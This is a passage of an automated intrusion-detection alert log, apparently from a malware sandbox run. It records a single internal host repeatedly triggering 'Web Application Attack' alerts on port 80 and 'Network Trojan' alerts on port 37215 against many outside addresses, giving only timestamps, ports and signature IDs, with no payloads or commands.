      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23147.46.197.7848994802030092 07/19/22-13:08:42.090797
      SID:2030092
      Source Port:48994
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.205.15.10139164802030092 07/19/22-13:08:59.355391
      SID:2030092
      Source Port:39164
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.237.5.19141656372152835222 07/19/22-13:08:55.343465
      SID:2835222
      Source Port:41656
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23114.33.162.5939342802030092 07/19/22-13:07:09.022807
      SID:2030092
      Source Port:39342
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.250.15.14549882372152835222 07/19/22-13:07:34.286455
      SID:2835222
      Source Port:49882
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2384.250.224.5746480802030092 07/19/22-13:08:20.413260
      SID:2030092
      Source Port:46480
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.247.24.13744580372152835222 07/19/22-13:07:46.281558
      SID:2835222
      Source Port:44580
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2335.190.126.6439512802030092 07/19/22-13:08:20.384512
      SID:2030092
      Source Port:39512
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23159.69.210.14355948802030092 07/19/22-13:07:41.636396
      SID:2030092
      Source Port:55948
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.207.133.19352818802030092 07/19/22-13:08:48.538261
      SID:2030092
      Source Port:52818
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2331.14.15.1952882802030092 07/19/22-13:07:30.189828
      SID:2030092
      Source Port:52882
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23150.220.146.17050762802030092 07/19/22-13:07:13.993627
      SID:2030092
      Source Port:50762
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2381.43.46.23356586802030092 07/19/22-13:08:20.437702
      SID:2030092
      Source Port:56586
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2379.112.116.16858638802030092 07/19/22-13:07:30.276881
      SID:2030092
      Source Port:58638
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23198.15.222.11936218802030092 07/19/22-13:07:18.707780
      SID:2030092
      Source Port:36218
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.244.122.16355870372152835222 07/19/22-13:07:33.551264
      SID:2835222
      Source Port:55870
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2338.2.73.20859112802030092 07/19/22-13:07:45.824107
      SID:2030092
      Source Port:59112
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23172.121.29.14442252802030092 07/19/22-13:07:30.507181
      SID:2030092
      Source Port:42252
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2344.196.135.13035296802030092 07/19/22-13:08:03.641197
      SID:2030092
      Source Port:35296
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2361.222.103.4154822802030092 07/19/22-13:08:27.056616
      SID:2030092
      Source Port:54822
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.238.59.7940748372152835222 07/19/22-13:08:51.041853
      SID:2835222
      Source Port:40748
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23108.157.172.25254876802030092 07/19/22-13:07:59.808244
      SID:2030092
      Source Port:54876
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.254.71.3159512372152835222 07/19/22-13:08:06.055739
      SID:2835222
      Source Port:59512
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23191.249.246.15848414802030092 07/19/22-13:07:00.983108
      SID:2030092
      Source Port:48414
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2367.215.248.17250024802030092 07/19/22-13:08:17.956411
      SID:2030092
      Source Port:50024
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2334.120.151.24650750802030092 07/19/22-13:07:18.436964
      SID:2030092
      Source Port:50750
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2335.215.234.20335716802030092 07/19/22-13:07:51.077781
      SID:2030092
      Source Port:35716
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.239.25.12059972802030092 07/19/22-13:08:31.789856
      SID:2030092
      Source Port:59972
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.224.30.1345786372152835222 07/19/22-13:08:50.164950
      SID:2835222
      Source Port:45786
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23203.165.67.7338320802030092 07/19/22-13:08:59.672678
      SID:2030092
      Source Port:38320
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23134.209.180.1939264802030092 07/19/22-13:07:59.587836
      SID:2030092
      Source Port:39264
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23138.100.70.24941138802030092 07/19/22-13:07:18.589733
      SID:2030092
      Source Port:41138
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23192.126.133.9952538802030092 07/19/22-13:08:03.670375
      SID:2030092
      Source Port:52538
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23220.135.29.6958476802030092 07/19/22-13:07:33.289291
      SID:2030092
      Source Port:58476
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2335.182.199.16059316802030092 07/19/22-13:07:18.734555
      SID:2030092
      Source Port:59316
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.226.86.11643180372152835222 07/19/22-13:08:47.432528
      SID:2835222
      Source Port:43180
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2314.50.50.10837690802030092 07/19/22-13:07:52.986480
      SID:2030092
      Source Port:37690
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23122.49.70.538908802030092 07/19/22-13:08:45.821588
      SID:2030092
      Source Port:38908
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23121.189.165.12447750802030092 07/19/22-13:08:17.838910
      SID:2030092
      Source Port:47750
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23138.201.55.4247498802030092 07/19/22-13:07:08.545075
      SID:2030092
      Source Port:47498
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2368.183.192.12034686802030092 07/19/22-13:08:23.305924
      SID:2030092
      Source Port:34686
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2347.180.227.745334802030092 07/19/22-13:07:45.797815
      SID:2030092
      Source Port:45334
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23150.105.100.18745246802030092 07/19/22-13:07:51.810219
      SID:2030092
      Source Port:45246
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2352.86.208.152874802030092 07/19/22-13:08:48.675545
      SID:2030092
      Source Port:52874
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23197.246.248.1953284372152835222 07/19/22-13:07:33.444617
      SID:2835222
      Source Port:53284
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23156.232.90.21053920372152835222 07/19/22-13:07:20.172827
      SID:2835222
      Source Port:53920
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2369.192.41.24937234802030092 07/19/22-13:08:28.973064
      SID:2030092
      Source Port:37234
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.76.84.15157314802030092 07/19/22-13:08:31.899183
      SID:2030092
      Source Port:57314
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.11.174.14253942802030092 07/19/22-13:07:47.439913
      SID:2030092
      Source Port:53942
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23186.189.233.2453668802030092 07/19/22-13:08:20.368047
      SID:2030092
      Source Port:53668
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2385.214.26.7749892802030092 07/19/22-13:08:56.548853
      SID:2030092
      Source Port:49892
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2318.213.74.5948794802030092 07/19/22-13:07:30.446773
      SID:2030092
      Source Port:48794
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.46.233.14751214802030092 07/19/22-13:07:59.820191
      SID:2030092
      Source Port:51214
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.226.74.3534138372152835222 07/19/22-13:07:44.419174
      SID:2835222
      Source Port:34138
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23168.196.224.24041734802030092 07/19/22-13:08:14.367886
      SID:2030092
      Source Port:41734
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23199.192.29.17548536802030092 07/19/22-13:08:40.505833
      SID:2030092
      Source Port:48536
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.225.150.16655178372152835222 07/19/22-13:07:41.259271
      SID:2835222
      Source Port:55178
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2334.98.102.748406802030092 07/19/22-13:08:02.041392
      SID:2030092
      Source Port:48406
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2313.125.81.5242478802030092 07/19/22-13:08:31.660794
      SID:2030092
      Source Port:42478
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.226.13.7353392372152835222 07/19/22-13:08:49.997397
      SID:2835222
      Source Port:53392
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2395.179.147.8443868802030092 07/19/22-13:08:31.691618
      SID:2030092
      Source Port:43868
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2379.172.2.23448482802030092 07/19/22-13:07:59.674611
      SID:2030092
      Source Port:48482
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.218.195.21243788802030092 07/19/22-13:08:20.510438
      SID:2030092
      Source Port:43788
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2350.87.189.13246932802030092 07/19/22-13:08:26.954055
      SID:2030092
      Source Port:46932
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.235.189.163.14241490802030092 07/19/22-13:07:00.291930
      SID:2030092
      Source Port:41490
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2338.63.104.3453988802030092 07/19/22-13:07:51.009981
      SID:2030092
      Source Port:53988
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.247.30.2332892372152835222 07/19/22-13:08:00.024205
      SID:2835222
      Source Port:32892
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2352.39.202.7145274802030092 07/19/22-13:07:18.471319
      SID:2030092
      Source Port:45274
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2352.14.225.7052808802030092 07/19/22-13:07:51.159151
      SID:2030092
      Source Port:52808
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2314.168.208.758434802030092 07/19/22-13:07:38.960118
      SID:2030092
      Source Port:58434
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.254.110.10548722372152835222 07/19/22-13:08:20.392396
      SID:2835222
      Source Port:48722
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23163.18.36.22550922802030092 07/19/22-13:07:18.819520
      SID:2030092
      Source Port:50922
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2395.169.185.21644296802030092 07/19/22-13:07:08.547095
      SID:2030092
      Source Port:44296
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2320.27.16.5452064802030092 07/19/22-13:08:27.305654
      SID:2030092
      Source Port:52064
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2367.7.129.6447702802030092 07/19/22-13:08:59.376095
      SID:2030092
      Source Port:47702
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.101.72.15239052802030092 07/19/22-13:08:12.913165
      SID:2030092
      Source Port:39052
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2346.16.19.19839646802030092 07/19/22-13:07:08.424793
      SID:2030092
      Source Port:39646
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23188.94.254.14352258802030092 07/19/22-13:07:31.946726
      SID:2030092
      Source Port:52258
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.238.159.10436642802030092 07/19/22-13:07:55.720725
      SID:2030092
      Source Port:36642
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23202.55.253.22251186802030092 07/19/22-13:07:25.288939
      SID:2030092
      Source Port:51186
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23197.234.41.14847132372152835222 07/19/22-13:08:09.719545
      SID:2835222
      Source Port:47132
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2388.221.43.9445814802030092 07/19/22-13:07:22.630188
      SID:2030092
      Source Port:45814
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.225.145.2237300372152835222 07/19/22-13:08:36.074281
      SID:2835222
      Source Port:37300
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2393.57.23.11840154802030092 07/19/22-13:08:42.693762
      SID:2030092
      Source Port:40154
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2352.3.26.1160870802030092 07/19/22-13:07:18.609779
      SID:2030092
      Source Port:60870
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23213.240.159.12357152802030092 07/19/22-13:08:59.695313
      SID:2030092
      Source Port:57152
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2379.150.39.3551176802030092 07/19/22-13:08:02.408681
      SID:2030092
      Source Port:51176
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23199.232.38.20850688802030092 07/19/22-13:08:27.002815
      SID:2030092
      Source Port:50688
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23193.26.18.843232802030092 07/19/22-13:08:48.397942
      SID:2030092
      Source Port:43232
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23107.151.105.17856134802030092 07/19/22-13:07:00.689109
      SID:2030092
      Source Port:56134
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.65.190.10940774802030092 07/19/22-13:07:55.739443
      SID:2030092
      Source Port:40774
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23173.223.66.17650968802030092 07/19/22-13:07:11.684375
      SID:2030092
      Source Port:50968
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.10.97.22454572802030092 07/19/22-13:07:47.193068
      SID:2030092
      Source Port:54572
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.254.51.11036146372152835222 07/19/22-13:08:41.116750
      SID:2835222
      Source Port:36146
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23149.56.206.20437952802030092 07/19/22-13:08:37.314309
      SID:2030092
      Source Port:37952
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23173.230.132.18141466802030092 07/19/22-13:08:09.757077
      SID:2030092
      Source Port:41466
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.120.49.22346324802030092 07/19/22-13:08:31.696986
      SID:2030092
      Source Port:46324
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.226.94.16954188372152835222 07/19/22-13:08:50.227298
      SID:2835222
      Source Port:54188
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2347.40.30.15451156802030092 07/19/22-13:08:09.932953
      SID:2030092
      Source Port:51156
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.240.108.5452076372152835222 07/19/22-13:07:56.550874
      SID:2835222
      Source Port:52076
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23192.95.37.8552808802030092 07/19/22-13:07:41.960969
      SID:2030092
      Source Port:52808
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.48.68.4335164802030092 07/19/22-13:08:37.381410
      SID:2030092
      Source Port:35164
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23218.149.214.15648734802030092 07/19/22-13:08:37.775075
      SID:2030092
      Source Port:48734
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.105.63.22634026802030092 07/19/22-13:08:26.957276
      SID:2030092
      Source Port:34026
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23144.91.120.21150312802030092 07/19/22-13:07:13.858525
      SID:2030092
      Source Port:50312
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23118.130.210.13933072802030092 07/19/22-13:07:44.373439
      SID:2030092
      Source Port:33072
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.232.83.169.10242784802030092 07/19/22-13:07:44.018362
      SID:2030092
      Source Port:42784
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2382.166.224.11458676802030092 07/19/22-13:08:08.520134
      SID:2030092
      Source Port:58676
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23129.219.200.6436980802030092 07/19/22-13:08:23.526620
      SID:2030092
      Source Port:36980
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2351.222.8.1157060802030092 07/19/22-13:08:54.156308
      SID:2030092
      Source Port:57060
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2324.97.13.21033572802030092 07/19/22-13:08:16.030563
      SID:2030092
      Source Port:33572
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23209.197.99.9553990802030092 07/19/22-13:08:51.991265
      SID:2030092
      Source Port:53990
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2386.24.52.10735044802030092 07/19/22-13:08:08.650000
      SID:2030092
      Source Port:35044
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23177.185.54.2757556802030092 07/19/22-13:08:20.634982
      SID:2030092
      Source Port:57556
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.241.125.15534794372152835222 07/19/22-13:07:53.128221
      SID:2835222
      Source Port:34794
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23156.244.101.2737302372152835222 07/19/22-13:07:00.050037
      SID:2835222
      Source Port:37302
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2375.101.164.3356606802030092 07/19/22-13:07:00.761215
      SID:2030092
      Source Port:56606
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23161.117.235.19143316802030092 07/19/22-13:07:21.754600
      SID:2030092
      Source Port:43316
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2344.242.89.21238742802030092 07/19/22-13:07:22.151251
      SID:2030092
      Source Port:38742
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23179.53.73.24039618802030092 07/19/22-13:08:05.728719
      SID:2030092
      Source Port:39618
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.77.222.2159400802030092 07/19/22-13:07:45.848792
      SID:2030092
      Source Port:59400
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23198.2.241.11354854802030092 07/19/22-13:07:44.032450
      SID:2030092
      Source Port:54854
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2352.18.190.9943612802030092 07/19/22-13:07:47.620768
      SID:2030092
      Source Port:43612
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.225.158.20833774372152835222 07/19/22-13:08:36.220376
      SID:2835222
      Source Port:33774
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2313.70.2.9455220802030092 07/19/22-13:07:59.717022
      SID:2030092
      Source Port:55220
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2335.241.58.22238106802030092 07/19/22-13:07:16.252637
      SID:2030092
      Source Port:38106
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2362.221.199.11341988802030092 07/19/22-13:07:33.557025
      SID:2030092
      Source Port:41988
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23116.93.97.2746340802030092 07/19/22-13:07:44.135909
      SID:2030092
      Source Port:46340
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23107.180.2.2948296802030092 07/19/22-13:07:45.729774
      SID:2030092
      Source Port:48296
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23213.215.11.20344276802030092 07/19/22-13:08:03.668976
      SID:2030092
      Source Port:44276
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2359.6.82.11133828802030092 07/19/22-13:08:16.293855
      SID:2030092
      Source Port:33828
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2345.39.175.18656224802030092 07/19/22-13:07:00.593310
      SID:2030092
      Source Port:56224
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23149.169.176.2054846802030092 07/19/22-13:08:37.374997
      SID:2030092
      Source Port:54846
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.65.67.24441390802030092 07/19/22-13:07:00.839037
      SID:2030092
      Source Port:41390
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2371.19.150.10949840802030092 07/19/22-13:08:41.934732
      SID:2030092
      Source Port:49840
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.254.54.17953736372152835222 07/19/22-13:07:33.948053
      SID:2835222
      Source Port:53736
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2345.15.66.3444276802030092 07/19/22-13:07:08.624060
      SID:2030092
      Source Port:44276
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23168.196.159.17734494802030092 07/19/22-13:08:20.413084
      SID:2030092
      Source Port:34494
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23172.65.170.18260228802030092 07/19/22-13:07:11.607741
      SID:2030092
      Source Port:60228
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.226.120.22944798372152835222 07/19/22-13:07:00.334162
      SID:2835222
      Source Port:44798
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23163.191.102.243154802030092 07/19/22-13:08:34.944618
      SID:2030092
      Source Port:43154
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23139.162.171.3459298802030092 07/19/22-13:08:17.610861
      SID:2030092
      Source Port:59298
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.238.48.85.16738828802030092 07/19/22-13:08:37.804426
      SID:2030092
      Source Port:38828
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23103.193.186.5648398802030092 07/19/22-13:08:46.045249
      SID:2030092
      Source Port:48398
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23185.150.32.17141640802030092 07/19/22-13:07:27.764346
      SID:2030092
      Source Port:41640
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2314.35.75.20348544802030092 07/19/22-13:08:29.140642
      SID:2030092
      Source Port:48544
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2334.248.28.14453692802030092 07/19/22-13:07:30.235891
      SID:2030092
      Source Port:53692
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.224.31.22142054372152835222 07/19/22-13:08:02.433819
      SID:2835222
      Source Port:42054
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23104.120.217.9133622802030092 07/19/22-13:08:31.681740
      SID:2030092
      Source Port:33622
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23218.161.40.24536934802030092 07/19/22-13:07:46.889870
      SID:2030092
      Source Port:36934
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23118.130.210.13933228802030092 07/19/22-13:07:47.955961
      SID:2030092
      Source Port:33228
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.250.30.25138200372152835222 07/19/22-13:08:38.308547
      SID:2835222
      Source Port:38200
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2379.114.190.2154124802030092 07/19/22-13:08:59.720759
      SID:2030092
      Source Port:54124
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2384.86.204.23641168802030092 07/19/22-13:08:20.902036
      SID:2030092
      Source Port:41168
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23107.149.188.13239266802030092 07/19/22-13:07:26.262124
      SID:2030092
      Source Port:39266
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.230.249.10638922802030092 07/19/22-13:08:22.528689
      SID:2030092
      Source Port:38922
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.77.159.15343504802030092 07/19/22-13:07:52.813922
      SID:2030092
      Source Port:43504
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.241.9.6160224372152835222 07/19/22-13:07:57.784220
      SID:2835222
      Source Port:60224
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23206.74.222.8937450802030092 07/19/22-13:08:17.965068
      SID:2030092
      Source Port:37450
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.82.153.10156142802030092 07/19/22-13:07:59.554982
      SID:2030092
      Source Port:56142
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23200.6.240.15745274802030092 07/19/22-13:08:56.558263
      SID:2030092
      Source Port:45274
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
